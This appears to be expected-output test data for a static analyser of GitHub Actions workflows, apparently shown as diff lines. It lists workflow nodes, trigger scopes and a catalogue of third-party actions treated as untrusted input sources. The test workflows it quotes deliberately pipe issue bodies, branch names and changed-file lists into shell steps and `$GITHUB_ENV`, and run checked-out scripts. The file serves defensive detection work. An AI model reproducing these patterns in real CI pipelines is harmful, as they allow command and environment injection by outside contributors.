.github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:5:5:9:2 | .github/workflows/shell.yml@5:5:9:2 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:9:9:2 | .github/workflows/shell.yml@7:9:9:2 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:8:14:8:31 | .github/workflows/shell.yml@8:14:8:31 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:10:5:14:2 | .github/workflows/shell.yml@10:5:14:2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:9:14:2 | .github/workflows/shell.yml@12:9:14:2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:14:12:23 | .github/workflows/shell.yml@12:14:12:23 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:15:5:19:2 | .github/workflows/shell.yml@15:5:19:2 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:9:19:2 | .github/workflows/shell.yml@17:9:19:2 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:18:14:18:23 | .github/workflows/shell.yml@18:14:18:23 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:20:5:22:32 | .github/workflows/shell.yml@20:5:22:32 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:9:22:32 | .github/workflows/shell.yml@22:9:22:32 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:14:22:31 | .github/workflows/shell.yml@22:14:22:31 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | +| 